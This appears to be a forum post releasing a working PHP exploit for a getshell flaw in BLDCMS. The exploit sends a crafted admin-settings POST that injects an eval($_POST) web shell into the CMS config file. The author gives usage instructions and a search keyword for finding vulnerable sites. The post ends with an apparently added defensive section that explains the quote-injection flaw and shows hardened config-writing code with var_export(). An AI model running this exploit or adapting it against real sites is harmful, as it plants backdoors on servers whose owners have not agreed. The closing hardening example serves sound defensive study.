Earlier I wanted to go after a hacker site and noticed that a neighbouring site on the same server was running BLDCMS, so I downloaded it and took a look... and found a getshell vulnerability.

By the way, last night 晴天小铸 found that someone had already posted an analysis of this getshell vulnerability on 90sec. Damn, somebody beat me to it.

Since it's already out, I'll release the EXP I had written earlier.
```php
<?php
echo "-------------------------------------------------------------------------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n 2013.3.21\r\n 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-------------------------------------------------------------------------------\r\n";

// Command-line arguments: target host, CMS directory, password for the one-line shell.
$url  = $argv[1];
$dir  = $argv[2];
$pass = $argv[3];

// Value that closes the single-quoted PHP string the CMS writes into its config file
// and appends an eval() of the chosen POST parameter. Only works when GPC is off.
$eval = '\';eval($_POST[' . '"' . $pass . '"' . ']);\'';

if (empty($pass) || empty($url)) {
    exit("请输入参数");
} else {
    // Form body for the admin settings handler; the payload goes into the sqlite field.
    $fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;
    $length   = strlen($fuckdata);

    function getshell($url, $pass)
    {
        global $url, $dir, $pass, $eval, $length, $fuckdata;

        // Raw HTTP request built by hand and sent over a plain socket.
        $header  = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:" . $url . "\r\n";
        $header .= "Content-Length: " . $length . "\r\n";
        $header .= "Connection: Close\r\n";
        $header .= "\r\n";
        $header .= $fuckdata . "\r\n\r\n";

        $fp = fsockopen($url, 80, $errno, $errstr, 15);
        if (!$fp) {
            exit("利用失败:请检查指定目标是否能正常打开");
        } else {
            if (!fputs($fp, $header)) {
                exit("利用失败");
            } else {
                // Read and discard the response, then report where the shell should be.
                $receive = '';
                while (!feof($fp)) {
                    $receive .= @fgets($fp, 1000);
                }
                @fclose($fp);
                echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
            }
        }
    }

    getshell($url, $pass);
}
?>
```
by 数据流
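The EXP above works by submitting a setting whose value begins with a single quote and a semicolon. When the CMS writes the submitted settings into a PHP file (the post points at conn/config/normal2.php) and the quote is not escaped (the GPC=Off precondition), the remainder of the value becomes PHP code that runs the next time the file is included. The following PHP is an added example, not code from this post or from BLDCMS: it shows the unsafe config-writing pattern beside a hardened version that whitelists keys and serializes values with var_export(), plus a round-trip check. The function names, the $posted sample input and the temporary-file handling are assumptions made for the example; the field names in $allowed are taken from the EXP's POST body.

```php
<?php
// Added example, not code from the original post or from BLDCMS.
// Assumption: the CMS saves admin-submitted settings by generating a PHP file that is
// later include()d. Function and variable names here are hypothetical.

// UNSAFE pattern: the raw value is concatenated into PHP source inside single quotes.
// It only "works" while magic_quotes_gpc escapes quotes for you, which is off in the
// EXP's precondition (GPC=Off) and was removed from PHP entirely in 5.4.
function build_config_unsafe(array $settings): string
{
    $php = "<?php\n";
    foreach ($settings as $key => $value) {
        $php .= "\$config['" . $key . "'] = '" . $value . "';\n";
    }
    return $php;
}

// HARDENED pattern: whitelist the keys and let var_export() emit a correctly escaped
// literal for every value, so no input can terminate the string and append code.
function build_config_safe(array $settings, array $allowedKeys): string
{
    $clean = [];
    foreach ($allowedKeys as $key) {
        if (array_key_exists($key, $settings)) {
            $clean[$key] = (string) $settings[$key];
        }
    }
    return "<?php\nreturn " . var_export($clean, true) . ";\n";
}

// Round-trip check: write the generated file, include it, and confirm every value comes
// back byte-for-byte as data and that non-whitelisted keys were dropped.
function roundtrip_safe(array $settings, array $allowedKeys): bool
{
    $tmp = tempnam(sys_get_temp_dir(), 'cfg');
    file_put_contents($tmp, build_config_safe($settings, $allowedKeys));
    $loaded = include $tmp;
    unlink($tmp);
    foreach ($allowedKeys as $key) {
        if (isset($settings[$key]) && $loaded[$key] !== (string) $settings[$key]) {
            return false;
        }
    }
    return !isset($loaded['notallowed']);
}

// Constructed sample input: a quote-terminator injection in one field and a key the
// form should never accept.
$posted = [
    'sitename'   => 'My Site',
    'sqlite'     => "x';echo 'injected';'",   // closes the single-quoted literal
    'notallowed' => '1',
];
$allowed = ['sitename', 'qq', 'getcontent', 'tongji', 'cmsmd5', 'sqlite'];

echo "--- unsafe output (note the extra statement on the sqlite line) ---\n";
echo build_config_unsafe($posted);
echo "--- hardened output ---\n";
echo build_config_safe($posted, $allowed);
echo "round-trip ok: " . (roundtrip_safe($posted, $allowed) ? 'yes' : 'no') . "\n";
```

Run it with `php example.php`: the unsafe builder emits `$config['sqlite'] = 'x';echo 'injected';'';`, which is three valid PHP statements, while the hardened builder emits a single quoted literal with the quotes escaped and the round-trip check reports `yes`. Serializing with var_export() (or storing settings as JSON or in a database rather than as PHP source) removes the injection point regardless of the magic_quotes setting. Note also that the EXP sends its request without any session cookie; the post does not say whether the handler checks one, but an access check on the admin handler is the second layer that should stop this kind of request.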